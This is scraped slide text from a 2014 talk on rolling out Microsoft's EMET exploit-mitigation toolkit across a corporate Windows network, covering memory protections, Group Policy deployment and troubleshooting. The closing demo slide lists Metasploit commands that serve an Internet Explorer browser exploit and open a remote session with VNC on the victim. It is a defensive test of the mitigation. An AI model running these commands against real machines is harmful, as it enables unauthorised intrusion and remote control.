View
4
Download
0
Category
Preview:
Citation preview
Like what you hear? Tweet it using: #Sec360 5/13/2014
PRESENTATION Overview
Technical details
Testing
Rolling out in a Corporate Environment
Troubleshooting
Lessons Learned
Tips for Maximum security settings
Demo!
Trademarks owned by their respective owners
WHY RUN EMET? Do you have top notch anti-malware?
Are your PCs still being exploited? § No Anti-malware product is 100% effective § Zero-day exploits for IE / Flash / Adobe Reader / Java / etc…
Would you like to improve your odds?
SELLING EMET EMET Software:
Blocks “zero-day” malware exploits
Supplements existing anti-malware
Supported by Microsoft
Uses group policy
Minimal overhead
But wait, there’s more…
It’s FREE!!!
OK, WHAT IS EMET EMET: Enhanced Mitigation Experience Toolkit
A free software package from Microsoft § Available since 2009 / officially supported since 2011 § Current version is 4.1 (& 5.0 preview)
Blocks memory corruption /buffer overflow exploits § Example: it randomizes memory locations
Low overhead: Uses the Application Compatibility Framework, rather than running as a program § No need to recompile applications
Install on every workstation
WHY RUN EMET? Because Microsoft recommends it:
4/26/2014 - Microsoft KB2963983 IE Vulnerability – “Workarounds […] Deploy the Enhanced Mitigation Experience Toolkit”
3/24/2014 – Microsoft SRD2953095 Word Vulnerability – “our tests showed that EMET default configuration can block the exploits seen in the wild.”
3/11/2014 – Microsoft MS14-012 IE Vulnerability – “Does EMET help mitigate attacks that could attempt to exploit these vulnerabilities? Yes.”
…
7/28/2010 – Microsoft FF859539 IE Aurora Vulnerability – “EMET can help prevent successful exploitation on systems lacking the update.”
… and it blocks many more for Flash / Adobe Reader / Java / etc…
WHERE IT WORKS BEST Workstations typically get infected in two ways:
1. Workstation has vulnerable software § E.g. Unpatched/zero-day Adobe, Java, Office, Browser Plug-ins § Users visit automated exploit web site, or open bad email document
-> Install EMET
2. Users get tricked into running bad software § Payroll.exe, UPS-Tracking.zip, FakeAV.com
-> Train Users, EMET less effective
* In addition to other mitigations such as anti-malware
TECHNICAL: PROTECTION OVERVIEW Three Types of Protection:
1. System Wide § Programs can be coded to opt-in or opt-out
2. Per-Program § Enforces protection on specific programs
3. Per-Web-Site § Alerts users to fraudulent SSL/TLS certificates
TECHNICAL: 1. SYSTEM-WIDE 1. System Wide Protections:
DEP - Data Execution Prevention § Marks data (heap/stack) memory as non-executable § Requires support by the CPU (Intel=XD, AMD=NX)
SEHOP – Exception Handling § OS walks exception chain to validate before using it
ASLR – Address Randomization § Use different memory locations each boot
TECHNICAL: 1. SYSTEM-WIDE 1. System-Wide Protection Options: DEP / SEHOP/ASLR
Always On – All programs will use
Opt-Out – On except if program is written to opt-out
Opt-In – Off except if program is written to opt-in
Disabled – No programs will use
Opt-In vs. Opt-Out depends on risk tolerance/resources
Opt-In is the Microsoft recommendation § Less protection, but less compatibility issues
TECHNICAL: 2. PER-PROGRAM 2. Per-program Protection Options:
Memory Protections: § DEP / Bottom-Up ASLR / Mandatory ASLR / Heap Spray (blocks
common locations) / Null Page Return Oriented Programming (ROP): § Load Library checks (no UNC DLL calls)/ Memory protection checks
(disallow stack executable) / Caller Checks (critical functions only via “call” not “return”) / Stack Pivot (detect if stack pivoted)/ Simulate execution flow (detect ROP gadgets)
Other: § SEHOP / EAF (Export Address table Filtering - blocks API address
lookup) /ASR (Attack Surface Reduction in v5.0, blocks specific plugins)
Note: Any protection applied to a browser protects all its plug-ins too
TECHNICAL: 3. CERTIFICATE TRUST 3. Per-web-site (v4): Certificate Trust Pinning � Deters an attacker from using a compromised certificate vendor to
intercept traffic (DigiNotar/Google) in IE § E.g. https://www.facebook.com can only use DigiCert/Equifax/
GeoTrust/Thawte/VeriSign certs § Config: MS / Yahoo / Skype / Twitter /Facebook § Might require maintenance with non-MS entries § Can specify expiration date, allow same country, etc.
Only warns users, doesn’t block
Not configurable by group policy
… CERTIFICATE TRUST
Example:
Certificate Trust Pinning https://www.facebook.com
Certificate Authority must be: DigiCert/Equifax/GeoTrust/ Thawte/VeriSign
E.g. but not DigiNotar
TESTING ON A PC
Install Microsoft .Net 4.0 (& KB 2790907 on Win 8/2012)
Download EMET from http://microsoft.com/emet
Install § It will ask if you want Recommended Settings § If no configuration is done, EMET doesn’t protect
…TESTING ON A PC DEMO
Install
Start GUI
Settings § System-Wide § Always On / App Opt-Out / App Opt-In / Disabled
§ Per-program § v3 / ROP / Mitigation Settings § Manually Adding
§ Web Certificate CA Pinning
…TESTING ON A PC Start up the GUI:
Start Menu -> EMET -> EMET GUI
Sample Test Settings:
DEP: Opt In
SEHOP: Opt In
ASLR: Opt In
Pinning: Enabled
…TESTING ON A PC Import per-Application & Cert Pinning Settings:
Import -> Popular § Popular has more than
Recommended
Import -> CertTrust § Contains SSL/TLS certificate
pinning rules for a few web sites
ROLLING OUT: PREP Download EMET (& .Net 4) § http://www.microsoft.com/emet
Extract Group Policy ADM* files § msiexec /a "EMET Setup.msi" /qb TARGETDIR="c:\temp“
§ (or copy from the EMET directory if EMET is already installed)
Install Group Policy ADM* files § Only needed on machines that will modify group policy § Copy EMET.admx and EMET.adml in c:\temp\group policy files to \Windows
\PolicyDefinitions (admx), \Windows\PolicyDefinitions\en-US (adml) § Note: ADM* files different for each EMET version – use current ones
ROLLING OUT: ACTIVE DIRECTORY
Note: Create a test OU container for each department / drag and drop PC
ROLLING OUT: SETTINGS
Note: Create a Group Policy Object, then link to each Test OU container
ROLLING OUT: SETTINGS
Note: IE, Popular, and Recommended Software are not similar
ROLLING OUT: SETTINGS
Include a shutdown script to apply the group policy: EMET_Conf --refresh
ROLLING OUT: SOFTWARE Roll out .Net 4.0 (& KB 2790907 on Win 8/2012)
Roll out EMET using Group Policy or other method
TROUBLESHOOTING EMET notification: Popup Window
OS Application log: § Office Plug-ins
also produce an Application Error, search disk for the module
EMET V4 KNOWN ISSUES Group Policy settings don’t display properly in EMET GUI § Commands that will display them:
emet-conf --list reg query HKLM\Software\Policies\Microsoft\EMET
\SysSettings
Certificate Trust Pinning limitations: § EMET Group Policy doesn’t contain those settings § Not available for the “Modern” IE app in Windows 8
Review the included EMET User’s Guide and the EMET web forum for additional caveats
LESSONS LEARNED 1. DEP breaks legacy applications § Roll out EMET to enterprise in phases § Set the system-wide DEP: Opt-in, not Always-on § E.g. breaks end-of-life versions of Crystal Reports
§ Can individually configure workstations to opt-out of DEP for a specific application if you set DEP to Opt-in § Computer Properties / Advanced /Performance / DEP
§ Can use the free Microsoft Application Compatibility Toolkit to create a “shim” to roll out for the application to opt-out of 32-bit DEP § Compatibility Fix setting: “Disable NX”
LESSONS LEARNED 2. Apply Group Policy settings before installing § Settings didn’t always apply afterwards § Can get the settings to apply by adding a Group Policy shutdown
script to run “emet_conf --refresh”
3. Uninstalling EMET doesn’t revert system-wide changes (DEP) § Revert system-wide changes then uninstall § Tools - Windows 7: bcdedit § Possible BitLocker issue with DEP changes
4. IE developers may need EAF disabled for IE, WinZip may need update for Outlook plugin compatibility
LESSONS LEARNED: THE GOOD POINTS 5. Office/IE issues only starting/closing application § A non-compatible add-in, one user a week issue § Users claim no impact on them § Yes, seriously – I asked twice
6. Fun to get notified if logging workstations centrally § Malware tends to give
multiple EMET alerts
TIPS FOR EXTRA SECURITY Microsoft’s recommendation for Windows 7: § “Opt-in” for System-wide settings § “Recommended Software” (IE/Office/Adobe/Java) for Per-application settings
A better recommendation: § Add “Popular Software” for Per-application settings § Adds other applications such as Firefox and Chrome web browsers § Big bang for the buck with minimal issues – DO IT!
Maximum settings: Not a recommendation with legacy software § “Opt-out” for System-wide settings (“Always On” won’t allow fixes to work) § Breaks DEP with 32-bit legacy applications – Possibly not worth extra effort
§ Create and deploy “shims” to fix the applications
REFERENCES Microsoft EMET Homepage § www.microsoft.com/emet § Download link has the User Guide
EMET Support Forum § social.technet.microsoft.com/Forums/security/en-US/home?forum=emet
Microsoft Videos § Tech: technet.microsoft.com/en-us/security/ff859539.aspx § Non-Tech: http://aka.ms/pjyesw § EMET 4.1/5.0 TP: http://technet.microsoft.com/en-us/security/jj653751
EMET PROTECTION DEMO DEMO
Testing EMET using Metasploit w/ Armitage GUI § Systems:
§ Windows 7 § Metasploit /Armitage on Kali 1.0 (~BackTrack)
§ Msfupdate, Kali/System/Metasploit/Start, Kali/Exploit/Net/Armitage § Exploit:
§ (Kali) use exploit/windows/browser/ms11_003_ie_css_import § set SRVPORT=80 /set URIPATH=funny § exploit –j
§ (Win7) Browse to http://server/funny § (Kali/Console) sessions / session -i 1 / run vnc
QUESTIONS? Contact:
Chris Covington, CISSP
ccovington@logis.org
Recommended